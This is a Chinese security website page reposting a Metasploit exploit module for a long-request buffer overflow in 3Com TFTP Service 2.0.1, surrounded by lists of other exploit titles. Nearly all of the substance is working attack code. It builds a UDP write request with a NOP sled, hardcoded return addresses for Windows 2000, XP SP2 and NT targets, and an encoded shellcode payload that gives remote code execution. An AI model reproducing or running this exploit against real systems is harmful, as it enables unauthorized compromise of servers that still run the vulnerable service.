首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Exploits 3CTftpSvc Server 2.0.1 Long Requesat Buffer Overflow (metasploit)
来源:www.vfcocus.net 作者:LiuQixu 发布时间:2009-01-14  
require 'msf/core'

module Msf

class Exploits::Windows::Tftp::ThreeCeeTftpSvc_Overflow < Msf::Exploit::Remote

        include Exploit::Remote::Udp

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => '3CTftpSvc Server 2.0.1 Long Requesat Buffer Overflow',
                        'Description'    => %q{
                                3Com TFTP Service version 2.0.1 suffers from a long type buffer
                                overflow during a write TFTP request. Does not require write access
                                to be enabled on the server.

                                Attacker controls ESI.

                                Liu Qixu of NCNIPC published this vulnerability.
                        },
                        'Author'         => 'grutz [at] jingojango.net',
                        'Version'        => '$',
                        'References'     => 
                                [ 
                                        ['URL', 'http://support.3com.com/software/utilities_for_windows_32_bit.htm'],
                                        ['BID', '21301'],
                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'thread',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 440,
                                        'BadChars' => "\x00",
                                        'StackAdjustment' => -3500,
                                },
                        'Platform'       => 'win',
                        
                        'Targets'        =>
                                [
                                        ['Windows 2000 All SP English',   { 'Ret' => 0x750217ae } ], # call esi ws2help
                                        ['Windows XP SP2 English',        { 'Ret' => 0x71aa1b22 } ], # call esi ws2help
                                        ['Windows NT SP5/6 English',      { 'Ret' => 0x776a117e } ], # call esi ws2help
                                ],

                        'DefaultTarget'  => 0,
                        'Privileged'     => false,
                        'DisclosureDate' => 'Nov 27 2006'

                        ))

                        register_options(
                                [
                                                Opt::RPORT(69)
                                ], self)

        end

        def exploit
                connect_udp

                print_status("Trying target #{target.name}...")

                sploit = 
                        "\x00\x02" + 
                        Rex::Text.rand_text_english(1, payload_badchars) + 
                        "\x00" +
                        make_nops(473) +
                        [target.ret].pack('V') +
                        "\x00"
                        
        sploit[9, payload.encoded.length] = payload.encoded

                udp_sock.put(sploit)
                
                disconnect_udp          
        end

end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AT-TFTP Buffer Overflow (Long
·AAA EasyGrid ActiveX 3.51 Rem
·3CTftpSvc transport mode name
·phosheezy 2.0 Remote Command E
·3ctftpsvc Buffer Overflow (Lon
·Oracle Secure Backup 10g exec_
·KDE Konqueror 4.1.3 'iframe sr
·Oracle TimesTen Remote Format
·KDE Konqueror 4.1.3 'link href
·NetSurf version 1.2 remote mem
·Cisco VLAN Trunking Protocol D
·NetSurf version 1.2 width remo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved